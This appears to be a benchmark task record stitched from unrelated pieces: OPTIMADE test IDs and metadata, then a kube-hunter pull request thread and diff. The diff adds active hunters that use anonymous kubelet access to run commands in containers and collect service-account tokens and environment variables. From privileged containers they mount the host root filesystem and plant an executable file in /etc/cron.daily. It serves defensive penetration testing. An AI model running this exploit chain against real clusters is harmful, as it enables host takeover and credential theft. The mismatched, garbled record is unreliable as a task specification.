"tests/server/test_client.py::test_client_endpoints[False]", "tests/server/test_client.py::test_client_endpoints[True]", "tests/server/test_client.py::test_filter_validation[True]", "tests/server/test_client.py::test_filter_validation[False]", "tests/server/test_client.py::test_client_response_fields[True]", "tests/server/test_client.py::test_client_response_fields[False]", "tests/server/test_client.py::test_multiple_base_urls[True]", "tests/server/test_client.py::test_multiple_base_urls[False]", "tests/server/test_client.py::test_include_exclude_providers[True]", "tests/server/test_client.py::test_include_exclude_providers[False]", "tests/server/test_client.py::test_client_sort[True]", "tests/server/test_client.py::test_client_sort[False]", "tests/server/test_client.py::test_command_line_client[True]", "tests/server/test_client.py::test_command_line_client[False]", "tests/server/test_client.py::test_command_line_client_silent[True]", "tests/server/test_client.py::test_command_line_client_silent[False]", "tests/server/test_client.py::test_command_line_client_multi_provider[True]", "tests/server/test_client.py::test_command_line_client_multi_provider[False]", "tests/server/test_client.py::test_command_line_client_write_to_file[True]", "tests/server/test_client.py::test_command_line_client_write_to_file[False]", "tests/server/test_client.py::test_strict_async[True]", "tests/server/test_client.py::test_strict_async[False]", "tests/server/test_client.py::test_client_global_data_callback[True]", "tests/server/test_client.py::test_client_global_data_callback[False]", "tests/server/test_client.py::test_client_page_skip_callback[True]", "tests/server/test_client.py::test_client_page_skip_callback[False]", "tests/server/test_client.py::test_client_mutable_data_callback[True]", "tests/server/test_client.py::test_client_mutable_data_callback[False]", "tests/server/test_client.py::test_client_asynchronous_write_callback[True]", 
"tests/server/test_client.py::test_client_asynchronous_write_callback[False]", "tests/server/test_client.py::test_binary_search_internals[1_0]", "tests/server/test_client.py::test_binary_search_internals[2_0]", "tests/server/test_client.py::test_binary_search_internals[1_1]", "tests/server/test_client.py::test_binary_search_internals[1_2]", "tests/server/test_client.py::test_binary_search_internals[1_3]", "tests/server/test_client.py::test_binary_search_internals[2_1]", "tests/server/test_client.py::test_binary_search_internals[2_2]", "tests/server/test_client.py::test_binary_search_internals[3]", "tests/server/test_client.py::test_binary_search_internals[4]", "tests/server/test_client.py::test_binary_search_internals[5]", "tests/server/test_client.py::test_binary_search_internals[6]", "tests/server/test_client.py::test_binary_search_internals[7]", "tests/server/test_client.py::test_binary_search_internals[9]", "tests/server/test_client.py::test_binary_search_internals[12]", "tests/server/test_client.py::test_binary_search_internals[14]", "tests/server/test_client.py::test_binary_search_internals[18]", "tests/server/test_client.py::test_binary_search_internals[22]", "tests/server/test_client.py::test_binary_search_internals[27]", "tests/server/test_client.py::test_binary_search_internals[33]", "tests/server/test_client.py::test_binary_search_internals[41]", "tests/server/test_client.py::test_binary_search_internals[51]", "tests/server/test_client.py::test_binary_search_internals[63]", "tests/server/test_client.py::test_binary_search_internals[77]", "tests/server/test_client.py::test_binary_search_internals[95]", "tests/server/test_client.py::test_binary_search_internals[117]", "tests/server/test_client.py::test_binary_search_internals[144]", "tests/server/test_client.py::test_binary_search_internals[177]", "tests/server/test_client.py::test_binary_search_internals[218]", "tests/server/test_client.py::test_binary_search_internals[269]", 
"tests/server/test_client.py::test_binary_search_internals[331]", "tests/server/test_client.py::test_binary_search_internals[407]", "tests/server/test_client.py::test_binary_search_internals[501]", "tests/server/test_client.py::test_binary_search_internals[616]", "tests/server/test_client.py::test_binary_search_internals[758]", "tests/server/test_client.py::test_binary_search_internals[933]", "tests/server/test_client.py::test_binary_search_internals[1148]", "tests/server/test_client.py::test_binary_search_internals[1412]", "tests/server/test_client.py::test_binary_search_internals[1737]", "tests/server/test_client.py::test_binary_search_internals[2137]", "tests/server/test_client.py::test_binary_search_internals[2630]", "tests/server/test_client.py::test_binary_search_internals[3235]", "tests/server/test_client.py::test_binary_search_internals[3981]", "tests/server/test_client.py::test_binary_search_internals[4897]", "tests/server/test_client.py::test_binary_search_internals[6025]", "tests/server/test_client.py::test_binary_search_internals[7413]", "tests/server/test_client.py::test_binary_search_internals[9120]", "tests/server/test_client.py::test_binary_search_internals[11220]", "tests/server/test_client.py::test_binary_search_internals[13803]", "tests/server/test_client.py::test_binary_search_internals[16982]", "tests/server/test_client.py::test_binary_search_internals[20892]", "tests/server/test_client.py::test_binary_search_internals[25703]", "tests/server/test_client.py::test_binary_search_internals[31622]", "tests/server/test_client.py::test_binary_search_internals[38904]", "tests/server/test_client.py::test_binary_search_internals[47863]", "tests/server/test_client.py::test_binary_search_internals[58884]", "tests/server/test_client.py::test_binary_search_internals[72443]", "tests/server/test_client.py::test_binary_search_internals[89125]", "tests/server/test_client.py::test_binary_search_internals[109647]", 
"tests/server/test_client.py::test_binary_search_internals[134896]", "tests/server/test_client.py::test_binary_search_internals[165958]", "tests/server/test_client.py::test_binary_search_internals[204173]", "tests/server/test_client.py::test_binary_search_internals[251188]", "tests/server/test_client.py::test_binary_search_internals[309029]", "tests/server/test_client.py::test_binary_search_internals[380189]", "tests/server/test_client.py::test_binary_search_internals[467735]", "tests/server/test_client.py::test_binary_search_internals[575439]", "tests/server/test_client.py::test_binary_search_internals[707945]", "tests/server/test_client.py::test_binary_search_internals[870963]", "tests/server/test_client.py::test_binary_search_internals[1071519]", "tests/server/test_client.py::test_binary_search_internals[1318256]", "tests/server/test_client.py::test_binary_search_internals[1621810]", "tests/server/test_client.py::test_binary_search_internals[1995262]", "tests/server/test_client.py::test_binary_search_internals[2454708]", "tests/server/test_client.py::test_binary_search_internals[3019951]", "tests/server/test_client.py::test_binary_search_internals[3715352]", "tests/server/test_client.py::test_binary_search_internals[4570881]", "tests/server/test_client.py::test_binary_search_internals[5623413]", "tests/server/test_client.py::test_binary_search_internals[6918309]", "tests/server/test_client.py::test_binary_search_internals[8511380]", "tests/server/test_client.py::test_binary_search_internals[10471285]", "tests/server/test_client.py::test_binary_search_internals[12882495]", "tests/server/test_client.py::test_binary_search_internals[15848931]", "tests/server/test_client.py::test_binary_search_internals[19498445]", "tests/server/test_client.py::test_binary_search_internals[23988329]", "tests/server/test_client.py::test_binary_search_internals[29512092]", "tests/server/test_client.py::test_binary_search_internals[36307805]", 
"tests/server/test_client.py::test_binary_search_internals[44668359]", "tests/server/test_client.py::test_binary_search_internals[54954087]", "tests/server/test_client.py::test_binary_search_internals[67608297]", "tests/server/test_client.py::test_binary_search_internals[83176377]", "tests/server/test_client.py::test_binary_search_internals[102329299]", "tests/server/test_client.py::test_binary_search_internals[125892541]", "tests/server/test_client.py::test_binary_search_internals[154881661]", "tests/server/test_client.py::test_binary_search_internals[190546071]", "tests/server/test_client.py::test_binary_search_internals[234422881]", "tests/server/test_client.py::test_binary_search_internals[288403150]", "tests/server/test_client.py::test_binary_search_internals[354813389]", "tests/server/test_client.py::test_binary_search_internals[436515832]", "tests/server/test_client.py::test_binary_search_internals[537031796]", "tests/server/test_client.py::test_binary_search_internals[660693448]", "tests/server/test_client.py::test_binary_search_internals[812830516]", "tests/server/test_client.py::test_binary_search_internals[1000000000]", "tests/server/test_client.py::test_raw_get_one_sync", "tests/server/test_client.py::test_raw_get_one_async" ]
Method: StructureResourceAttributes.check_symmetry_operations(self) Location: optimade/models/structures.py Inputs: - self: an instance of StructureResourceAttributes containing • nperiodic_dimensions (int) • space_group_symmetry_operations_xyz (list[SymmetryOperation] | None) Outputs: Returns the same instance (self). Raises ValueError with a specific message when: - nperiodic_dimensions == 0 and space_group_symmetry_operations_xyz is not None, or - space_group_symmetry_operations_xyz is provided but does not include the required identity operation "x,y,z". Description: Model‑level validator that enforces OPTIMADE 1.2 rules for the newly added `space_group_symmetry_operations_xyz` field, ensuring it is omitted for non‑periodic structures and that the mandatory identity symmetry operation is present when the list is supplied.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/adapters/structures/test_structures.py tests/models/test_structures.py tests/server/test_client.py" }
{ "num_modified_files": 4, "num_modified_lines": 77, "pr_author": "ml-evs", "pr_labels": [ "schema: Concerns the schema models", "OPTIMADE v1.2: This label describes actions that have to be taken to be complient with OPTIMADE 1.2" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.86, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks to add support for the OPTIMADE 1.2 field `space_group_symmetry_operations_xyz`. The test patch defines the required model field, validation rules (identity operation required, pattern enforcement, disallow for non‑periodic structures), JSON fixtures, and OpenAPI updates. While the tests align with the intended behavior, the original issue text provides no acceptance criteria, making the specification ambiguous. 
This signals a primary B4 (ambiguous specification) problem.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
d6ca66644751d6df2dd0ed3591e63402186cd710
2020-04-24 14:12:02
abdullahgarcia: Please, review accordingly iYehuda: Hi @abdullahgarcia, thanks for your contribution! It might take us some time to review since it's not a little PR. abdullahgarcia: Hi @iYehuda, No worries. Please, let me know if you need any assistance or you have further doubts. Thanks! Abdullah abdullahgarcia: Hi @iYehuda, Just following up. Thanks! Abdullah lizrice: Hi @abdullahgarcia! I started looking at this but got waylaid by some other issues in active hunters. Thanks for the reminder :-) codecov-io: # [Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=h1) Report > Merging [#344](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=desc) into [master](https://codecov.io/gh/aquasecurity/kube-hunter/commit/a0127659b7d9d35bca23fa4436788316058249d9&el=desc) will **increase** coverage by `3.64%`. > The diff coverage is `95.34%`. [![Impacted file tree graph](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344/graphs/tree.svg?width=650&height=150&src=pr&token=hXSGvlUpkI)](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #344 +/- ## ========================================== + Coverage 57.68% 61.32% +3.64% ========================================== Files 40 40 Lines 2037 2252 +215 ========================================== + Hits 1175 1381 +206 - Misses 862 871 +9 ``` | [Impacted Files](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [kube\_hunter/modules/hunting/kubelet.py](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344/diff?src=pr&el=tree#diff-a3ViZV9odW50ZXIvbW9kdWxlcy9odW50aW5nL2t1YmVsZXQucHk=) | `59.38% <95.34%> (+28.47%)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=continue). 
> **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=footer). Last update [a012765...4b31c1e](https://codecov.io/gh/aquasecurity/kube-hunter/pull/344?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments). abdullahgarcia: Hi @lizrice, Just following up. Thanks! Abdullah abdullahgarcia: > Hi @lizrice, > > Just following up. > > Thanks! > > Abdullah abdullahgarcia: Hi @lizrice, Just checking if it would be easier to go together over the changes. Thanks! lizrice: So many apologies @abdullahgarcia. I started testing this out, got distracted by finding #350 and then other things got in the way! We are looking at it now, thank you for highlighting this in yesterday's call. abdullahgarcia: Hi @danielsagi, Just following up after the changes. Thanks! Abdullah danielsagi: Hi @abdullahgarcia , Thanks for the ping. We're just doing some tests on our side to make sure everythings as expected, I believe that in the next few days this will be done. I will update you. abdullahgarcia: Hi @danielsagi, I've addressed your comments. Please, let me know if anything else is required. Thanks again! Abdullah lizrice: Thanks again for this @abdullahgarcia, and for your patience!
aquasecurity__kube-hunter-344
diff --git a/docs/_kb/KHV051.md b/docs/_kb/KHV051.md new file mode 100644 index 0000000..b09de24 --- /dev/null +++ b/docs/_kb/KHV051.md @@ -0,0 +1,40 @@ +--- +vid: KHV051 +title: Exposed Existing Privileged Containers Via Secure Kubelet Port +categories: [Access Risk] +--- + +# {{ page.vid }} - {{ page.title }} + +## Issue description + +The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPs API. This may expose certain information and capabilities to an attacker with access to the kubelet API. + +A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector. + +Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within the containers (specifically privileged ones), a malicious actor can leverage such capabilities to do way more damage in the cluster than expected: e.g. start/modify process on host. + +## Remediation + +Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider. + +Minimize the use of privileged containers. + +Use Pod Security Policies to enforce using `privileged: false` policy. + +Review the RBAC permissions to Kubernetes API server for the anonymous and default service account, including bindings. + +Ensure node(s) runs active filesystem monitoring. + +Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config. + +Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. 
Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; this will depend on the API server version running. + +## References + +- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/) +- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers) +- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged) +- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) +- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %}) +- [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %}) diff --git a/kube_hunter/modules/hunting/kubelet.py b/kube_hunter/modules/hunting/kubelet.py index 05f9dfa..cd02192 100644 --- a/kube_hunter/modules/hunting/kubelet.py +++ b/kube_hunter/modules/hunting/kubelet.py @@ -1,10 +1,12 @@ import json import logging +import time from enum import Enum import re import requests import urllib3 +import uuid from kube_hunter.conf import get_config from kube_hunter.core.events import handler @@ -119,6 +121,22 @@ class ExposedHealthzHandler(Vulnerability, Event): self.evidence = f"status: {self.status}" +class ExposedExistingPrivilegedContainersViaSecureKubeletPort(Vulnerability, Event): + """A malicious actor, that has confirmed anonymous access to the API via the kubelet's secure port, \ +can leverage the existing privileged containers identified to damage the host and potentially \ +the whole cluster""" + + def __init__(self, exposed_existing_privileged_containers): + Vulnerability.__init__( + self, + component=KubernetesCluster, + name="Exposed Existing Privileged Container(s) Via Secure Kubelet Port", + category=AccessRisk, + vid="KHV051", + ) + self.exposed_existing_privileged_containers = exposed_existing_privileged_containers + + 
class PrivilegedContainers(Vulnerability, Event): """A Privileged container exist on a node could expose the node/cluster to unwanted root operations""" @@ -434,6 +452,520 @@ class SecureKubeletPortHunter(Hunter): } +""" Active Hunters """ + + +@handler.subscribe(AnonymousAuthEnabled) +class ProveAnonymousAuth(ActiveHunter): + """Foothold Via Secure Kubelet Port + Attempts to demonstrate that a malicious actor can establish foothold into the cluster via a + container abusing the configuration of the kubelet's secure port: authentication-auth=false. + """ + + def __init__(self, event): + self.event = event + self.base_url = "https://{host}:10250/".format(host=self.event.host) + + def get_request(self, url, verify=False): + config = get_config() + try: + response_text = self.event.session.get(url=url, verify=verify, timeout=config.network_timeout).text.rstrip() + + return response_text + except Exception as ex: + logging.debug("Exception: " + str(ex)) + return "Exception: " + str(ex) + + def post_request(self, url, params, verify=False): + config = get_config() + try: + response_text = self.event.session.post( + url=url, verify=verify, params=params, timeout=config.network_timeout + ).text.rstrip() + + return response_text + except Exception as ex: + logging.debug("Exception: " + str(ex)) + return "Exception: " + str(ex) + + @staticmethod + def has_no_exception(result): + return "Exception: " not in result + + @staticmethod + def has_no_error(result): + possible_errors = ["exited with", "Operation not permitted", "Permission denied", "No such file or directory"] + + return not any(error in result for error in possible_errors) + + @staticmethod + def has_no_error_nor_exception(result): + return ProveAnonymousAuth.has_no_error(result) and ProveAnonymousAuth.has_no_exception(result) + + def cat_command(self, run_request_url, full_file_path): + return self.post_request(run_request_url, {"cmd": "cat {}".format(full_file_path)}) + + def process_container(self, 
run_request_url): + service_account_token = self.cat_command(run_request_url, "/var/run/secrets/kubernetes.io/serviceaccount/token") + + environment_variables = self.post_request(run_request_url, {"cmd": "env"}) + + if self.has_no_error_nor_exception(service_account_token): + return { + "result": True, + "service_account_token": service_account_token, + "environment_variables": environment_variables, + } + + return {"result": False} + + def execute(self): + pods_raw = self.get_request(self.base_url + KubeletHandlers.PODS.value) + + # At this point, the following must happen: + # a) we get the data of the running pods + # b) we get a forbidden message because the API server + # has a configuration that denies anonymous attempts despite the kubelet being vulnerable + + if self.has_no_error_nor_exception(pods_raw) and "items" in pods_raw: + pods_data = json.loads(pods_raw)["items"] + + temp_message = "" + exposed_existing_privileged_containers = list() + + for pod_data in pods_data: + pod_namespace = pod_data["metadata"]["namespace"] + pod_id = pod_data["metadata"]["name"] + + for container_data in pod_data["spec"]["containers"]: + container_name = container_data["name"] + + run_request_url = self.base_url + "run/{}/{}/{}".format(pod_namespace, pod_id, container_name) + + extracted_data = self.process_container(run_request_url) + + if extracted_data["result"]: + service_account_token = extracted_data["service_account_token"] + environment_variables = extracted_data["environment_variables"] + + temp_message += ( + "\n\nPod namespace: {}".format(pod_namespace) + + "\n\nPod ID: {}".format(pod_id) + + "\n\nContainer name: {}".format(container_name) + + "\n\nService account token: {}".format(service_account_token) + + "\nEnvironment variables: {}".format(environment_variables) + ) + + first_check = container_data.get("securityContext", {}).get("privileged") + + first_subset = container_data.get("securityContext", {}) + second_subset = first_subset.get("capabilities", {}) + 
data_for_second_check = second_subset.get("add", []) + + second_check = "SYS_ADMIN" in data_for_second_check + + if first_check or second_check: + exposed_existing_privileged_containers.append( + { + "pod_namespace": pod_namespace, + "pod_id": pod_id, + "container_name": container_name, + "service_account_token": service_account_token, + "environment_variables": environment_variables, + } + ) + + if temp_message: + message = "The following containers have been successfully breached." + temp_message + + self.event.evidence = "{}".format(message) + + if exposed_existing_privileged_containers: + self.publish_event( + ExposedExistingPrivilegedContainersViaSecureKubeletPort( + exposed_existing_privileged_containers=exposed_existing_privileged_containers + ) + ) + + +@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort) +class MaliciousIntentViaSecureKubeletPort(ActiveHunter): + """Malicious Intent Via Secure Kubelet Port + Attempts to demonstrate that a malicious actor can leverage existing privileged containers + exposed via the kubelet's secure port, due to anonymous auth enabled misconfiguration, + such that a process can be started or modified on the host. 
+ """ + + def __init__(self, event, seconds_to_wait_for_os_command=1): + self.event = event + self.base_url = "https://{host}:10250/".format(host=self.event.host) + self.seconds_to_wait_for_os_command = seconds_to_wait_for_os_command + self.number_of_rm_attempts = 5 + self.number_of_rmdir_attempts = 5 + self.number_of_umount_attempts = 5 + + def post_request(self, url, params, verify=False): + config = get_config() + try: + response_text = self.event.session.post( + url, verify, params=params, timeout=config.network_timeout + ).text.rstrip() + + return response_text + except Exception as ex: + logging.debug("Exception: " + str(ex)) + return "Exception: " + str(ex) + + def cat_command(self, run_request_url, full_file_path): + return self.post_request(run_request_url, {"cmd": "cat {}".format(full_file_path)}) + + def clean_attacked_exposed_existing_privileged_container( + self, + run_request_url, + file_system_or_partition, + directory_created, + file_created, + number_of_rm_attempts, + number_of_umount_attempts, + number_of_rmdir_attempts, + seconds_to_wait_for_os_command, + ): + + self.rm_command( + run_request_url, + "{}/etc/cron.daily/{}".format(directory_created, file_created), + number_of_rm_attempts, + seconds_to_wait_for_os_command, + ) + + self.umount_command( + run_request_url, + file_system_or_partition, + directory_created, + number_of_umount_attempts, + seconds_to_wait_for_os_command, + ) + + self.rmdir_command( + run_request_url, directory_created, number_of_rmdir_attempts, seconds_to_wait_for_os_command, + ) + + def check_file_exists(self, run_request_url, file): + file_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=file) + + return ProveAnonymousAuth.has_no_error_nor_exception(file_exists) + + def rm_command(self, run_request_url, file_to_remove, number_of_rm_attempts, seconds_to_wait_for_os_command): + if self.check_file_exists(run_request_url, file_to_remove): + for _ in range(number_of_rm_attempts): + 
command_execution_outcome = self.post_request( + run_request_url, {"cmd": "rm -f {}".format(file_to_remove)} + ) + + if seconds_to_wait_for_os_command: + time.sleep(seconds_to_wait_for_os_command) + + first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome) + second_check = self.check_file_exists(run_request_url, file_to_remove) + + if first_check and not second_check: + return True + + pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1] + container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2] + logger.warning( + "kube-hunter: " + + "POD=" + + pod_id + + ", " + + "CONTAINER=" + + container_name + + " - Unable to remove file: " + + file_to_remove + ) + + return False + + def chmod_command(self, run_request_url, permissions, file): + return self.post_request(run_request_url, {"cmd": "chmod {} {}".format(permissions, file)}) + + def touch_command(self, run_request_url, file_to_create): + return self.post_request(run_request_url, {"cmd": "touch {}".format(file_to_create)}) + + def attack_exposed_existing_privileged_container( + self, run_request_url, directory_created, number_of_rm_attempts, seconds_to_wait_for_os_command, file_name=None + ): + if file_name is None: + file_name = "kube-hunter" + str(uuid.uuid1()) + + file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name) + + file_created = self.touch_command(run_request_url, file_name_with_path) + + if ProveAnonymousAuth.has_no_error_nor_exception(file_created): + permissions_changed = self.chmod_command(run_request_url, "755", file_name_with_path) + + if ProveAnonymousAuth.has_no_error_nor_exception(permissions_changed): + return {"result": True, "file_created": file_name} + + self.rm_command(run_request_url, file_name_with_path, number_of_rm_attempts, seconds_to_wait_for_os_command) + + return {"result": False} + + def check_directory_exists(self, run_request_url, directory): + directory_exists = 
self.ls_command(run_request_url=run_request_url, file_or_directory=directory) + + return ProveAnonymousAuth.has_no_error_nor_exception(directory_exists) + + def rmdir_command( + self, run_request_url, directory_to_remove, number_of_rmdir_attempts, seconds_to_wait_for_os_command, + ): + if self.check_directory_exists(run_request_url, directory_to_remove): + for _ in range(number_of_rmdir_attempts): + command_execution_outcome = self.post_request( + run_request_url, {"cmd": "rmdir {}".format(directory_to_remove)} + ) + + if seconds_to_wait_for_os_command: + time.sleep(seconds_to_wait_for_os_command) + + first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome) + second_check = self.check_directory_exists(run_request_url, directory_to_remove) + + if first_check and not second_check: + return True + + pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1] + container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2] + logger.warning( + "kube-hunter: " + + "POD=" + + pod_id + + ", " + + "CONTAINER=" + + container_name + + " - Unable to remove directory: " + + directory_to_remove + ) + + return False + + def ls_command(self, run_request_url, file_or_directory): + return self.post_request(run_request_url, {"cmd": "ls {}".format(file_or_directory)}) + + def umount_command( + self, + run_request_url, + file_system_or_partition, + directory, + number_of_umount_attempts, + seconds_to_wait_for_os_command, + ): + # Note: the logic implemented proved more reliable than using "df" + # command to resolve for mounted systems/partitions. 
+ current_files_and_directories = self.ls_command(run_request_url, directory) + + if self.ls_command(run_request_url, directory) == current_files_and_directories: + for _ in range(number_of_umount_attempts): + # Ref: http://man7.org/linux/man-pages/man2/umount.2.html + command_execution_outcome = self.post_request( + run_request_url, {"cmd": "umount {} {}".format(file_system_or_partition, directory)} + ) + + if seconds_to_wait_for_os_command: + time.sleep(seconds_to_wait_for_os_command) + + first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome) + second_check = self.ls_command(run_request_url, directory) != current_files_and_directories + + if first_check and second_check: + return True + + pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1] + container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2] + logger.warning( + "kube-hunter: " + + "POD=" + + pod_id + + ", " + + "CONTAINER=" + + container_name + + " - Unable to unmount " + + file_system_or_partition + + " at: " + + directory + ) + + return False + + def mount_command(self, run_request_url, file_system_or_partition, directory): + # Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html + return self.post_request(run_request_url, {"cmd": "mount {} {}".format(file_system_or_partition, directory)}) + + def mkdir_command(self, run_request_url, directory_to_create): + # Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html + return self.post_request(run_request_url, {"cmd": "mkdir {}".format(directory_to_create)}) + + def findfs_command(self, run_request_url, file_system_or_partition_type, file_system_or_partition): + # Ref: http://man7.org/linux/man-pages/man8/findfs.8.html + return self.post_request( + run_request_url, {"cmd": "findfs {}{}".format(file_system_or_partition_type, file_system_or_partition)} + ) + + def get_root_values(self, command_line): + for command in command_line.split(" "): + # Check for variable-definition 
commands as there can be commands which don't define variables. + if "=" in command: + split = command.split("=") + if split[0] == "root": + if len(split) > 2: + # Potential valid scenario: root=LABEL=example + root_value_type = split[1] + "=" + root_value = split[2] + + return root_value, root_value_type + else: + root_value_type = "" + root_value = split[1] + + return root_value, root_value_type + + return None, None + + def process_exposed_existing_privileged_container( + self, + run_request_url, + number_of_umount_attempts, + number_of_rmdir_attempts, + seconds_to_wait_for_os_command, + directory_to_create=None, + ): + if directory_to_create is None: + directory_to_create = "/kube-hunter_" + str(uuid.uuid1()) + + # /proc/cmdline - This file shows the parameters passed to the kernel at the time it is started. + command_line = self.cat_command(run_request_url, "/proc/cmdline") + + if ProveAnonymousAuth.has_no_error_nor_exception(command_line): + if len(command_line.split(" ")) > 0: + root_value, root_value_type = self.get_root_values(command_line) + + # Move forward only when the "root" variable value was actually defined. 
+ if root_value: + if root_value_type: + file_system_or_partition = self.findfs_command(run_request_url, root_value_type, root_value) + else: + file_system_or_partition = root_value + + if ProveAnonymousAuth.has_no_error_nor_exception(file_system_or_partition): + directory_created = self.mkdir_command(run_request_url, directory_to_create) + + if ProveAnonymousAuth.has_no_error_nor_exception(directory_created): + directory_created = directory_to_create + + mounted_file_system_or_partition = self.mount_command( + run_request_url, file_system_or_partition, directory_created + ) + + if ProveAnonymousAuth.has_no_error_nor_exception(mounted_file_system_or_partition): + host_name = self.cat_command( + run_request_url, "{}/etc/hostname".format(directory_created) + ) + + if ProveAnonymousAuth.has_no_error_nor_exception(host_name): + return { + "result": True, + "file_system_or_partition": file_system_or_partition, + "directory_created": directory_created, + } + + self.umount_command( + run_request_url, + file_system_or_partition, + directory_created, + number_of_umount_attempts, + seconds_to_wait_for_os_command, + ) + + self.rmdir_command( + run_request_url, + directory_created, + number_of_rmdir_attempts, + seconds_to_wait_for_os_command, + ) + + return {"result": False} + + def execute(self, directory_to_create=None, file_name=None): + temp_message = "" + + for exposed_existing_privileged_containers in self.event.exposed_existing_privileged_containers: + pod_namespace = exposed_existing_privileged_containers["pod_namespace"] + pod_id = exposed_existing_privileged_containers["pod_id"] + container_name = exposed_existing_privileged_containers["container_name"] + + run_request_url = self.base_url + "run/{}/{}/{}".format(pod_namespace, pod_id, container_name) + + is_exposed_existing_privileged_container_privileged = self.process_exposed_existing_privileged_container( + run_request_url, + self.number_of_umount_attempts, + self.number_of_rmdir_attempts, + 
self.seconds_to_wait_for_os_command, + directory_to_create, + ) + + if is_exposed_existing_privileged_container_privileged["result"]: + file_system_or_partition = is_exposed_existing_privileged_container_privileged[ + "file_system_or_partition" + ] + directory_created = is_exposed_existing_privileged_container_privileged["directory_created"] + + # Execute attack attempt: start/modify process in host. + attack_successful_on_exposed_privileged_container = self.attack_exposed_existing_privileged_container( + run_request_url, + directory_created, + self.number_of_rm_attempts, + self.seconds_to_wait_for_os_command, + file_name, + ) + + if attack_successful_on_exposed_privileged_container["result"]: + file_created = attack_successful_on_exposed_privileged_container["file_created"] + + self.clean_attacked_exposed_existing_privileged_container( + run_request_url, + file_system_or_partition, + directory_created, + file_created, + self.number_of_rm_attempts, + self.number_of_umount_attempts, + self.number_of_rmdir_attempts, + self.seconds_to_wait_for_os_command, + ) + + temp_message += "\n\nPod namespace: {}\n\nPod ID: {}\n\nContainer name: {}".format( + pod_namespace, pod_id, container_name + ) + + if temp_message: + message = ( + "The following exposed existing privileged containers" + + " have been successfully abused by starting/modifying a process in the host." + + temp_message + ) + + self.event.evidence = "{}".format(message) + else: + message = ( + "The following exposed existing privileged containers" + + " were not successfully abused by starting/modifying a process in the host." + + "Keep in mind that attackers might use other methods to attempt to abuse them." 
